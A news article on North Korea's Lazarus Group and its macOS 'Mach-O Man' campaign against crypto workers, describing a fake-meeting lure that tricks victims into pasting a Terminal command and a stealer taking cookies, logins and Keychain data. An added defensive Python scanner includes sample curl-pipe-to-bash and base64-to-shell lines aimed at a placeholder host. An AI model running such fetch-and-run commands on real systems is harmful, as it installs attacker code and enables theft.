Mach-O Man

Lazarus Group Targets Crypto Firms With “Mach-O Man”: Certik

Key Highlights

  • Lazarus Group is running a macOS-focused cyber campaign called “Mach-O Man,” targeting crypto and fintech workers.
  • The attack uses social engineering to trick users into running a Terminal command that installs malware to steal private information.
  • The group has stolen billions in crypto over the years and continues to use more advanced methods like this campaign.

A senior blockchain security researcher at Certik reportedly said that North Korea’s Lazarus Group is running a new macOS-focused campaign called the “Mach-O Man.”

A new report indicates the campaign is focused on users of macOS who work in the cryptocurrency, financial technology, and other valuable business sectors.

How the “Mach-O Man” campaign works

According to security firm ANY.RUN, this attack typically begins on Telegram. Victims receive what appears to be a standard meeting invitation, frequently sent from a compromised account of someone they recognize and trust.

The Lazarus Group has recently launched “Mach-O Man,” a new malware specifically designed for macOS systems. It targets companies in the financial technology and cryptocurrency sectors, as well as high-profile individuals. The attack typically begins with a seemingly urgent meeting invitation sent via Telegram, leading to a realistic but fake website disguised as a Zoom, Teams, or Google Meet login page.

— Vladimir S. | Officer’s Notes (@officer_secret) April 21, 2026

The scam message then instructs the victim to join a video call on a platform such as Zoom, Teams, or Meet. Clicking the link leads to a fake error page claiming there is a problem joining the call. The page asks the victim to copy a command and paste it into the Terminal app on their Mac, supposedly to fix the issue; running that command is what installs the malicious software.

Once the initial command is executed, the first stage of the malicious software begins to run and downloads a disguised application that mimics legitimate software. Because it is launched through standard, built-in system tools, it looks legitimate to macOS security controls, which lets it get past initial defenses and stay unnoticed by the user.
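The paste-into-Terminal step described above is the point where a defender can still catch this campaign before any payload lands, so it is worth being able to spot such commands in shell history or endpoint telemetry. The following is an added example, not code from the report, ANY.RUN, or Certik: it scans zsh history lines for the command shapes that such lures typically use. The history entries are constructed, and since the page does not give the actual command used in the campaign, the patterns are assumptions about common pipe-to-shell forms rather than signatures for this specific malware.

```python
import re
from dataclasses import dataclass

# Command shapes commonly used by "paste this into Terminal" lures (assumed;
# the page does not give the actual command): remote content piped into a
# shell, a shell spawned on fetched content, or an encoded blob decoded and
# executed in one line.
FETCH = r"\b(?:curl|wget)\b[^|;&]*"
SHELL = r"\b(?:sh|bash|zsh)\b"
PATTERNS = {
    "fetch_piped_to_shell": re.compile(FETCH + r"\|\s*(?:sudo\s+)?" + SHELL),
    "fetch_in_subshell": re.compile(SHELL + r"\s+-c\s+[\"']?\$\(\s*" + FETCH),
    "base64_decoded_to_shell": re.compile(
        r"\bbase64\s+(?:-d|--decode|-D)\b[^|]*\|\s*" + SHELL),
}

# Constructed zsh extended-history entries (": <epoch>:<duration>;<command>").
# Lines 2, 3 and 5 are the kind of one-liner a fake "fix your meeting" page
# would tell the user to run; the hostname is a placeholder.
SAMPLE_HISTORY = """\
: 1713700000:0;ls -la ~/Downloads
: 1713700010:0;curl -fsSL https://meeting-fix.example.invalid/fix.sh | bash
: 1713700020:0;echo aGVsbG8= | base64 -d | sh
: 1713700030:0;brew update
: 1713700040:0;bash -c "$(curl -s https://meeting-fix.example.invalid/zoom)"
""".splitlines()


@dataclass
class Finding:
    line_no: int
    rule: str
    command: str


def scan_history(lines):
    """Return one Finding per (line, rule) match over shell history lines."""
    findings = []
    for n, raw in enumerate(lines, 1):
        cmd = re.sub(r"^:\s*\d+:\d+;", "", raw).strip()  # strip zsh prefix
        for rule, pat in PATTERNS.items():
            if pat.search(cmd):
                findings.append(Finding(n, rule, cmd))
    return findings


if __name__ == "__main__":
    for f in scan_history(SAMPLE_HISTORY):
        print(f"line {f.line_no}: {f.rule}: {f.command}")
```

On a real host the same function can be pointed at ~/.zsh_history or at process-creation events from an EDR, and any hit should be treated as a lead for checking what the fetched payload then installed, not as proof of compromise on its own.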

Inside the malware system

ANY.RUN reports that this malware is written in Go and packaged as Mach-O binaries split into multiple components. It starts with a ‘stager’ component that initiates the infection. The malware then gathers details about the infected computer, such as its hostname, operating system, processor, network configuration, running programs, and installed browser extensions.

As a crypto investor, I’m really concerned to learn this malware scans for things like my Chrome, Safari, Firefox, Brave, Opera, and Vivaldi browsers. Apparently, all the information it finds gets sent right back to the hacker through Telegram. It’s a scary thought, knowing they’re trying to grab data from my everyday browsing.

This malware is designed to persistently remain on your system. It cleverly conceals itself within system files and automatically launches whenever you start your Mac, ensuring it survives restarts.

The last part of this process involves stealing private information like browser cookies, saved logins, and data from the macOS Keychain. This stolen information is then compressed into files and sent to the attackers through Telegram bots.

Security experts found that this malware tries to cover its tracks after stealing information. While some of its code is sloppy and contains errors – such as accidentally exposing sensitive codes – it still works because it depends on users unknowingly running the harmful commands themselves.

Why security measures matter

Crypto and fintech companies face significant risks. A single infected computer could allow hackers to steal sensitive information like wallet access codes, exchange keys, and internal tools, giving them access to company systems. This could lead to further network breaches or unauthorized financial activity.

As a researcher tracking cyber threats, I’ve observed that the Lazarus Group is responsible for numerous significant cryptocurrency attacks. Since 2017, they’ve stolen billions of dollars in digital assets. Their methods are sophisticated, combining direct hacking with social engineering and a knack for quietly infiltrating systems over extended periods.

This group has recently been connected to several major crypto thefts, including a $290 million hack of KelpDAO and an exploit on the Bybit exchange. Over the past four years, they’ve reportedly stolen around $7.3 billion from various cryptocurrency companies.

This group doesn’t just rely on hacking; they also create fake profiles and try to gain access through people working inside organizations. They slowly build their way in over time before launching an attack.

2026-04-22 19:33